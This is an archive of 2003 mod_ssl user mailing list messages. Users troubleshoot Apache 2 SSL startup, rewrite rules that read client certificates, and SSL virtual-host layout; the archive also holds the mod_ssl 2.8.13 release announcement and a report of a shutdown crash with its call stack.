From owner-modssl-users@modssl.org  Mon Mar 17 20:49:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E0DDA2AA038; Mon, 17 Mar 2003 20:49:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gavia.izoard.com (w044.z064003036.was-dc.dsl.cnc.net [64.3.36.44])
	by master.modssl.org (Postfix) with ESMTP id 5CC1F2AA01F
	for ; Mon, 17 Mar 2003 20:49:10 +0100 (CET)
Received: from mortirolo.izoard.com ([192.168.0.50] helo=izoard.com)
	by gavia.izoard.com with smtp (Exim 3.35 #1 (Debian))
	id 18v0ba-00053j-00
	for ; Mon, 17 Mar 2003 14:49:06 -0500
Received: from 199.196.144.13
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Mon, 17 Mar 2003 14:49:06 -0500 (EST)
Message-ID: <51405.199.196.144.13.1047930546.squirrel@www.izoard.com>
Date: Mon, 17 Mar 2003 14:49:06 -0500 (EST)
Subject: =?iso-8859-1?Q?Re:_How_to_'start'_mod_ssl=3F?=
From: "Aaron Stromas" 
To: 
In-Reply-To: 
References: 
X-Mailer: SquirrelMail (version 1.2.0 [rc2])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Stromas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Did you add any directories to be served over SSL? e.g. for CGI,


  
    SSLOptions +StdEnvVars
  


-a

Mitchell, Edmund said:
> Hello all
>
> I just built from source apache 2 on RedHat 8 with this config:
> $->./configure --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin
> --sbindir=/usr/sbin --enable-mods-shared=all --enable-so
> --with-mpm=worker --enable-ssl --with-ssl=/usr/include/openssl
> --libexecdir=/usr/lib/httpd/modules --mandir=/usr/share/man
> --sysconfdir=/etc/httpd/conf --datadir=/var/www --localstatedir=/var
> --disable-imap --disable-dav --disable-dav_fs --disable-speling
> --disable-autoindex
>
> and it went smoothly, as did make and make install.
>
> I tried to startssl, but it complained about the cert and key file, so
> I
> built those using the makefile that RedHat provides to build dummy
> certs
> and
> keys, and that went smoothly.  It then complained about the
> DocumentRoot,
> so
> I fixed that, and now it doesn't complain, but nothing happens.
>
> #->/usr/sbin/apachectl startssl
> #->ps -eaf | grep httpd
> root     19590 19172  0 13:53 pts/1    00:00:00 grep httpd
>
> #->/usr/sbin/httpd -DSSL
> #->ps -eaf | grep httpd
> root     19594 19172  0 13:53 pts/1    00:00:00 grep httpd
>
> I figured it was a weird situation so I tore out everything, and
> rebuilt from
> scratch.  Twice, and yes, both times I md5summed the tarball.
>
> However, each time, if I don't start ssl, it works:
>
> #->/usr/sbin/httpd -k start
> #->ps -eaf | grep httpd
> root     19597     1  0 13:56 ?        00:00:00 /usr/sbin/httpd -k
> start nobody   19598 19597  0 13:56 ?        00:00:00 /usr/sbin/httpd
> -k start nobody   19599 19597  0 13:56 ?        00:00:00
> /usr/sbin/httpd -k start nobody   19600 19597  1 13:56 ?
> 00:00:00 /usr/sbin/httpd -k start root     19658 19172  0 13:56 pts/1
>  00:00:00 grep httpd
>
> and then, I can connect to localhost, but not to port 443, even though
> I have
> no firewall at all.
>
> #->/sbin/iptables --list
> Chain INPUT (policy ACCEPT)
> target     prot opt source               destination
>
> Chain FORWARD (policy ACCEPT)
> target     prot opt source               destination
>
> Chain OUTPUT (policy ACCEPT)
> target     prot opt source               destination
>
> #->/usr/bin/openssl s_client -connect localhost:80
> CONNECTED(00000003)
> 19856:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> protocol:s23_clnt.c:460:
>
> #->/usr/bin/openssl s_client -connect localhost:443
> connect: Connection refused
> connect:errno=29
>
> The syntax seems to be OK; I haven't changed anything but what I
> mentioned above -
>
> #->/usr/sbin/httpd -t
> Syntax OK
> #->/usr/sbin/httpd -S
> VirtualHost configuration:
> Syntax OK
>
> I'm (obviously) new to this whole thing, so I'd be grateful if anyone
> who's been through this before can steer me in the right direction.
>
> Thanks for your time
>
> E
>
> -------------------------------------------------------
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 20:53:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 485F92AA035; Mon, 17 Mar 2003 20:53:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 77B902AA01A
	for ; Mon, 17 Mar 2003 20:53:09 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA28083;
	Mon, 17 Mar 2003 14:51:39 -0500
Date: Mon, 17 Mar 2003 14:51:38 -0500 (EST)
From: "R. DuFresne" 
To: "Mitchell, Edmund" 
Cc: "'modssl-users@modssl.org'" 
Subject: Re: How to "start" mod ssl?
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


it looks as though ssl might not be enabled in the httpd.conf file.

do you have these statements included there:

LoadModule ssl_module libexec/libssl.so
AddModule mod_ssl.c



Thanks,

Ron DuFresne

On Mon, 17 Mar 2003, Mitchell, Edmund wrote:

> Hello all
> 
> I just built from source apache 2 on RedHat 8 with this config:
> $->./configure --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin
> --sbindir=/usr/sbin --enable-mods-shared=all --enable-so --with-mpm=worker
> --enable-ssl --with-ssl=/usr/include/openssl
> --libexecdir=/usr/lib/httpd/modules --mandir=/usr/share/man
> --sysconfdir=/etc/httpd/conf --datadir=/var/www --localstatedir=/var
> --disable-imap --disable-dav --disable-dav_fs --disable-speling
> --disable-autoindex
> 
> and it went smoothly, as did make and make install.
> 
> I tried to startssl, but it complained about the cert and key file, so I
>  built those using the makefile that RedHat provides to build dummy certs
> and
>  keys, and that went smoothly.  It then complained about the DocumentRoot,
> so
>  I fixed that, and now it doesn't complain, but nothing happens.
> 
> #->/usr/sbin/apachectl startssl
> #->ps -eaf | grep httpd
> root     19590 19172  0 13:53 pts/1    00:00:00 grep httpd
> 
> #->/usr/sbin/httpd -DSSL
> #->ps -eaf | grep httpd
> root     19594 19172  0 13:53 pts/1    00:00:00 grep httpd
> 
> I figured it was a weird situation so I tore out everything, and rebuilt
> from
> scratch.  Twice, and yes, both times I md5summed the tarball.
> 
> However, each time, if I don't start ssl, it works:
> 
> #->/usr/sbin/httpd -k start
> #->ps -eaf | grep httpd
> root     19597     1  0 13:56 ?        00:00:00 /usr/sbin/httpd -k start
> nobody   19598 19597  0 13:56 ?        00:00:00 /usr/sbin/httpd -k start
> nobody   19599 19597  0 13:56 ?        00:00:00 /usr/sbin/httpd -k start
> nobody   19600 19597  1 13:56 ?        00:00:00 /usr/sbin/httpd -k start
> root     19658 19172  0 13:56 pts/1    00:00:00 grep httpd
> 
> and then, I can connect to localhost, but not to port 443, even though I
> have
> no firewall at all.
> 
> #->/sbin/iptables --list
> Chain INPUT (policy ACCEPT)
> target     prot opt source               destination
> 
> Chain FORWARD (policy ACCEPT)
> target     prot opt source               destination
> 
> Chain OUTPUT (policy ACCEPT)
> target     prot opt source               destination
> 
> #->/usr/bin/openssl s_client -connect localhost:80
> CONNECTED(00000003)
> 19856:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> protocol:s23_clnt.c:460:
> 
> #->/usr/bin/openssl s_client -connect localhost:443
> connect: Connection refused
> connect:errno=29
> 
> The syntax seems to be OK; I haven't changed anything but what I mentioned
> above -
> 
> #->/usr/sbin/httpd -t
> Syntax OK
> #->/usr/sbin/httpd -S
> VirtualHost configuration:
> Syntax OK
> 
> I'm (obviously) new to this whole thing, so I'd be grateful if anyone who's
> been through this before can steer me in the right direction.
> 
> Thanks for your time
> 
> E
> 
> -------------------------------------------------------
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 21:00:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A41D42AA035; Mon, 17 Mar 2003 21:00:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smx-chi04.fnis.com (smtp02.microgeneral.com [206.54.145.18])
	by master.modssl.org (Postfix) with ESMTP id 625BD2AA01A
	for ; Mon, 17 Mar 2003 21:00:51 +0100 (CET)
Received: from MailHUB1.fnf.com ([10.10.4.13]) by 10.248.61.37 with InterScan Messaging Security Suite; Mon, 17 Mar 2003 14:00:30 -0600
Received: by mailhub1.fnf.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 17 Mar 2003 11:59:44 -0800
Message-ID: 
From: "Mitchell, Edmund" 
To: "'modssl-users@modssl.org'" 
Subject: RE: How to 'start' mod ssl?
Date: Mon, 17 Mar 2003 11:54:28 -0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mitchell, Edmund" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



> -----Original Message-----
> From: Aaron Stromas [mailto:ams@izoard.com]
> Did you add any directories to be served over SSL? e.g. for CGI,

No, it is almost untouched.  The only changes are to give it the path
to the key file, the cert file, and the Document Root.

Was I supposed to do something like that?

Thanks

Edmund
 
> Mitchell, Edmund said:
> > Hello all
> >
> > I just built from source apache 2 on RedHat 8 with this config:
> > $->./configure --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin
> > --sbindir=/usr/sbin --enable-mods-shared=all --enable-so
> > --with-mpm=worker --enable-ssl --with-ssl=/usr/include/openssl
> > --libexecdir=/usr/lib/httpd/modules --mandir=/usr/share/man
> > --sysconfdir=/etc/httpd/conf --datadir=/var/www --localstatedir=/var
> > --disable-imap --disable-dav --disable-dav_fs --disable-speling
> > --disable-autoindex
> >
> > and it went smoothly, as did make and make install.
> >
> > I tried to startssl, but it complained about the cert and 
> key file, so
> > I
> > built those using the makefile that RedHat provides to build dummy
> > certs
> > and
> > keys, and that went smoothly.  It then complained about the
> > DocumentRoot,
> > so
> > I fixed that, and now it doesn't complain, but nothing happens.
> >
> > #->/usr/sbin/apachectl startssl
> > #->ps -eaf | grep httpd
> > root     19590 19172  0 13:53 pts/1    00:00:00 grep httpd
> >
> > #->/usr/sbin/httpd -DSSL
> > #->ps -eaf | grep httpd
> > root     19594 19172  0 13:53 pts/1    00:00:00 grep httpd
> >
> > I figured it was a weird situation so I tore out everything, and
> > rebuilt from
> > scratch.  Twice, and yes, both times I md5summed the tarball.
> >
> > However, each time, if I don't start ssl, it works:
> >
> > #->/usr/sbin/httpd -k start
> > #->ps -eaf | grep httpd
> > root     19597     1  0 13:56 ?        00:00:00 /usr/sbin/httpd -k
> > start nobody   19598 19597  0 13:56 ?        00:00:00 
> /usr/sbin/httpd
> > -k start nobody   19599 19597  0 13:56 ?        00:00:00
> > /usr/sbin/httpd -k start nobody   19600 19597  1 13:56 ?
> > 00:00:00 /usr/sbin/httpd -k start root     19658 19172  0 
> 13:56 pts/1
> >  00:00:00 grep httpd
> >
> > and then, I can connect to localhost, but not to port 443, 
> even though
> > I have
> > no firewall at all.
> >
> > #->/sbin/iptables --list
> > Chain INPUT (policy ACCEPT)
> > target     prot opt source               destination
> >
> > Chain FORWARD (policy ACCEPT)
> > target     prot opt source               destination
> >
> > Chain OUTPUT (policy ACCEPT)
> > target     prot opt source               destination
> >
> > #->/usr/bin/openssl s_client -connect localhost:80
> > CONNECTED(00000003)
> > 19856:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> > protocol:s23_clnt.c:460:
> >
> > #->/usr/bin/openssl s_client -connect localhost:443
> > connect: Connection refused
> > connect:errno=29
> >
> > The syntax seems to be OK; I haven't changed anything but what I
> > mentioned above -
> >
> > #->/usr/sbin/httpd -t
> > Syntax OK
> > #->/usr/sbin/httpd -S
> > VirtualHost configuration:
> > Syntax OK
> >
> > I'm (obviously) new to this whole thing, so I'd be grateful 
> if anyone
> > who's been through this before can steer me in the right direction.
> >
> > Thanks for your time
> >
> > E
> >
> > -------------------------------------------------------
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 17 21:36:28 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EEB492AA035; Mon, 17 Mar 2003 21:36:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.de [213.165.65.60])
	by master.modssl.org (Postfix) with SMTP id 6A72A2AA01A
	for ; Mon, 17 Mar 2003 21:36:27 +0100 (CET)
Received: (qmail 27541 invoked by uid 0); 17 Mar 2003 20:36:24 -0000
Received: from dclient217-162-146-55.hispeed.ch (HELO notebook) (217.162.146.55)
  by mail.gmx.net (mp010-rz3) with SMTP; 17 Mar 2003 20:36:24 -0000
Message-ID: <00f001c2ecbc$8881f420$3792a2d9@notebook>
From: "mario eugster" 
To: 
Subject: rewrite data form client certificate
Date: Mon, 17 Mar 2003 20:36:40 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00ED_01C2ECC4.EA07A570"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "mario eugster" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00ED_01C2ECC4.EA07A570
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi

I am trying to get the SSL_CLIENT_S_DN_CN from a client certificate
to use it in a RewriteRule. But I always get empty quary string. The =
config
is as following:

SSLOptions +StdEnvVars

RewriteEngine On
RewriteLog logs/rewrite.log
RewriteLogLevel 9
RewriteCond %{ENV:SSL_CLIENT_S_DN_CN} ^Simpson*
RewriteRule  ^/$                 /dir/index.html
[L]

Can I get environment variable like SSL_CLIENT_XXX within Rewrite =
Module? Or
are there any other possibilities to get access to them?

thanks for your help
mario

------=_NextPart_000_00ED_01C2ECC4.EA07A570
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











Hi

I am=20
trying to get the SSL_CLIENT_S_DN_CN from a client certificate
to use =
it in a=20
RewriteRule. But I always get empty quary string. The config
is as=20
following:

SSLOptions +StdEnvVars

RewriteEngine =
On
RewriteLog=20
logs/rewrite.log
RewriteLogLevel 9
RewriteCond =
%{ENV:SSL_CLIENT_S_DN_CN}=20
^Simpson*
RewriteRule =20
^/$           &nbs=
p;    =20
/dir/index.html
[L]

Can I get environment variable like =
SSL_CLIENT_XXX=20
within Rewrite Module? Or
are there any other possibilities to get =
access to=20
them?

thanks for your=20
help
mario


------=_NextPart_000_00ED_01C2ECC4.EA07A570--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:43:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D39E52AA04A; Tue, 18 Mar 2003 15:43:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP
	id 0FD1D2AA015; Tue, 18 Mar 2003 15:43:33 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DCDBE4CE575; Tue, 18 Mar 2003 15:43:32 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 60289286C2; Tue, 18 Mar 2003 15:43:16 +0100 (CET)
Date: Tue, 18 Mar 2003 15:43:16 +0100
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.13
Message-ID: <20030318144316.GA69190@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Another maintainance release of mod_ssl 2.8 for Apache 1.3 delivers to
you mod_ssl 2.8.13 for Apache 1.3.27. Changes are listed below. Grab it
from the following locations:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.13 (23-Oct-2002 to 18-Mar-2003)

   *) Always enforce RSA blinding on RSA private keys in order to be
      resistent to timing attacks.

   *) Added timeout also to the "pre-sucking" of the trailing data in
      POST request handling.

   *) Correctly shutdown shared memory pools on fork+exec situations.

   *) Bugfix SSL client certificate verification: OpenSSL was not
      informed with SSL_set_verify_result(ssl, X509_V_OK) in case
      mod_ssl forced the verification to be ok.

   *) Consistently use OPENSSL_free() instead of plain free() to
      deallocate memory chunks allocated inside OpenSSL.

   *) Fixed various memory leaks related to X509 certificates.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:43:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2AF622AA053; Tue, 18 Mar 2003 15:43:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id D76492AA051; Tue, 18 Mar 2003 15:43:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from mailexchange.infinetcomm.com (mailexchange.infinetcomm.com [207.245.44.19])
	by master.modssl.org (Postfix) with ESMTP id 6B7382AA055
	for ; Thu, 27 Feb 2003 22:16:07 +0100 (CET)
Received: from imail.torinfinet.infinetcomm.com (imail [10.98.1.31])
	by mailexchange.infinetcomm.com (8.11.4/8.11.4) with ESMTP id h1RK2hA11488;
	Thu, 27 Feb 2003 15:02:44 -0500
Received: by imail.torinfinet.infinetcomm.com with Internet Mail Service (5.5.2653.19)
	id <1H1QDCKR>; Thu, 27 Feb 2003 16:16:04 -0500
Message-ID: <49A0B02B67B70045B358D868C7B5D0C79874B0@imail.torinfinet.infinetcomm.com>
From: Shawn Syms 
To: "'modssl-users@modssl.org'" ,
	"'nick@tonkinresolutions.com'" 
Subject: RE: securing one area of a vhost in apache 2
Date: Thu, 27 Feb 2003 16:16:03 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Shawn Syms 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>>>So, bottom line, it is not possible to have a virtual host accessible via
http and require SSL for a part of it. Is that correct?

It's not really logical to want to segment out SSL-using and non-SSL-using
sections of a site within the server config; do this on the site itself in
the code. Here is what is commonly done, where I work anyway. 

In your apache config, specify the use of SSL for the entire site. The
certificate applies to the entire site anyway, since a certificate applies
to anything that falls under the fully qualified domain name (FQDN) on the
certificate.

In the ***code*** of your site, hardcode the URL for the sections that
security to include "https" -- this sort of hardcoding (ie, using an
absolute path for the links instead of a relative one) is not "bad form"
since the URL should only be accessed using the FQDN anyway (ie, along as
the value on the certificate doesn't change, neither would the single
correct URL). 

In the links that lead *out* of the secured area of the site, use absolute
links that specify "http" rather than "https".

Also in the code, if anyone tries to access those sections without SSL,
rewrite the URL in their browser so that it includes the "https".

And finally, also in the code, for any sections that don't require SSL (and
where you don't want the performance impact on needless SSL traffic), test
to see if the URL entered by the user includes "https" -- if it does,
rewrite it to remove the "s".

This works well for us and it pretty straight-forward to implement.

Regards,
S.


---
Shawn Syms | Team Lead, Systems Administration
Infinet Communications | shawn.syms@infinetcommunications.com
---




-----Original Message-----
From: Nick Tonkin [mailto:nick@tonkinresolutions.com]
Sent: Thursday, February 27, 2003 3:58 PM
To: R. DuFresne
Cc: modssl-users@modssl.org
Subject: Re: securing one area of a vhost in apache 2


On Thu, 27 Feb 2003, R. DuFresne wrote:

>
> You gave this site it's own IP address yes?

No. It is using NameVirtualHost.

>
> Virtual hosting with non-ssl works in a 'software' aware mode, while
> virtual hosting with ssl is more 'hardware' in nature requireing specifici
> IP addressing to function properly.


Hmm. I must have missed this in the docos. Rechecking ...

Hm. Well, I see that I was on the wrong track with "How can I authenticate
my clients for a particular URL based on certificates but still allow
arbitrary clients to access the remaining parts of the server?" ... that
appears on closer inspection to deal with certificate-wielding clients ...

Hm.

So, bottom line, it is not possible to have a virtual host accessible via
http and require SSL for a part of it. Is that correct?

Thanks,

- nick

-- 

~~~~~~~~~~~~~~~~~~~~~
Nick Tonkin   {|8^)>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:45:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CF36C2AA04A; Tue, 18 Mar 2003 15:45:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 6B2AB2AA020; Tue, 18 Mar 2003 15:45:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from atlrel8.hp.com (atlrel8.hp.com [156.153.255.206])
	by master.modssl.org (Postfix) with ESMTP id C10872AA015
	for ; Mon,  3 Mar 2003 21:16:35 +0100 (CET)
Received: from xatlrelay1.atl.hp.com (xatlrelay1.atl.hp.com [15.45.89.190])
	by atlrel8.hp.com (Postfix) with ESMTP id B141F1C00EF9
	for ; Mon,  3 Mar 2003 15:16:33 -0500 (EST)
Received: from xatlbh4.atl.hp.com (xatlbh4.atl.hp.com [15.45.89.189])
	by xatlrelay1.atl.hp.com (Postfix) with ESMTP id 84B5A1C000BE
	for ; Mon,  3 Mar 2003 15:16:33 -0500 (EST)
Received: by xatlbh4.atl.hp.com with Internet Mail Service (5.5.2655.55)
	id ; Mon, 3 Mar 2003 15:16:33 -0500
Message-ID: <25C4C6009B5BD5118FF30003470BF7F507DDC175@xboi04.boi.hp.com>
From: "WONG,ED (HP-Boise,ex1)" 
To: "'modssl-users@modssl.org'" 
Subject: shmcb access violation with openssl 0.9.6i
Date: Mon, 3 Mar 2003 15:16:27 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "WONG,ED (HP-Boise,ex1)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello All,

I've been able to consistantly reproduce a GPF on Apache service shutdown
using Openssl 0.9.6i, and Apache 2.0.44.

Swapping to an older version of Openssl (0.9.6g) resolved the GPF.

To reproduce, simply download and build OpenSSL 0.9.6i and Apache 2.0.44.
Be sure to configure ssl to use the shmcb ssl session caching.  Launch
apache as a service and browse to the server using SSL.  Then try to stop
the apache service.  During shutdown, Apache will GPF.

Oddly, if you don't browse to the webserver using SSL, Apache will not GPF
on shutdown.  

If it helps, the call stack looks as follows:

NTDLL! 77f51baa()
NTDLL! 77f7561d()
apr_file_write(apr_file_t * 0x005e91c8, const void * 0x0006dd6c, unsigned
int * 0x0006dd58) line 316
apr_file_puts(const char * 0x0006dd6c, apr_file_t * 0x005e91c8) line 441
log_error_core(const char * 0x6fd1d948, int 117, int 4, int 720006, const
server_rec * 0x00602700, const request_rec * 0x00000000, apr_pool_t *
0x00000000, const char * 0x6fd1d924, char * 0x0006fdd0) line 543
ap_log_error(const char * 0x6fd1d948, int 117, int 4, int 720006, const
server_rec * 0x00602700, const char * 0x6fd1d924) line 561 + 37 bytes
ssl_mutex_on(server_rec * 0x00602700) line 118 + 28 bytes
ssl_scache_shmcb_remove(server_rec * 0x00602700, unsigned char * 0x00689dd8,
int 32) line 476 + 9 bytes
ssl_scache_remove(server_rec * 0x00602700, unsigned char * 0x00689dd8, int
32) line 158 + 17 bytes
ssl_callback_DelSessionCacheEntry(ssl_ctx_st * 0x00645240, ssl_session_st *
0x00689d90) line 1722 + 17 bytes
timeout(ssl_session_st * 0x00689d90, timeout_param_st * 0x0006fe6c) line 602
+ 18 bytes
lh_doall_arg(lhash_st * 0x006453d0, void (void)* 0x1001a516
timeout(ssl_session_st *, timeout_param_st *), void * 0x0006fe6c) line 290 +
13 bytes
SSL_CTX_flush_sessions(ssl_ctx_st * 0x00645240, long 0) line 619 + 18 bytes
SSL_CTX_free(ssl_ctx_st * 0x00645240) line 1259 + 11 bytes
ssl_init_ctx_cleanup(modssl_ctx_t * 0x0064ef68) line 1197 + 21 bytes
ssl_init_ctx_cleanup_server(modssl_ctx_t * 0x0064ef68) line 1213 + 9 bytes
ssl_init_ModuleKill(void * 0x0030c458) line 1249 + 12 bytes
run_cleanups(cleanup_t * * 0x0030a5d0) line 1976 + 13 bytes
apr_pool_destroy(apr_pool_t * 0x0030a5c0) line 755 + 12 bytes
apr_pool_destroy(apr_pool_t * 0x00308588) line 752 + 12 bytes
destroy_and_exit_process(process_rec * 0x00308618, int 0) line 247
main(int 3, const char * const * 0x003024a8) line 658 + 11 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e814c7()

The error in log_error_core is:
[Mon Mar 03 12:43:04 2003] [warn] (OS 6)The handle is invalid.  : Failed to
acquire global mutex lock.

Is this a known issue?  Is there something that I'm missing?  Other than
changing from DBM to SHMCB, I have stock conf files.

Thanks in Advance,

************************************
Edward Wong                     
Connectivity Software Engineer


Hewlett-Packard Company  
************************************
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
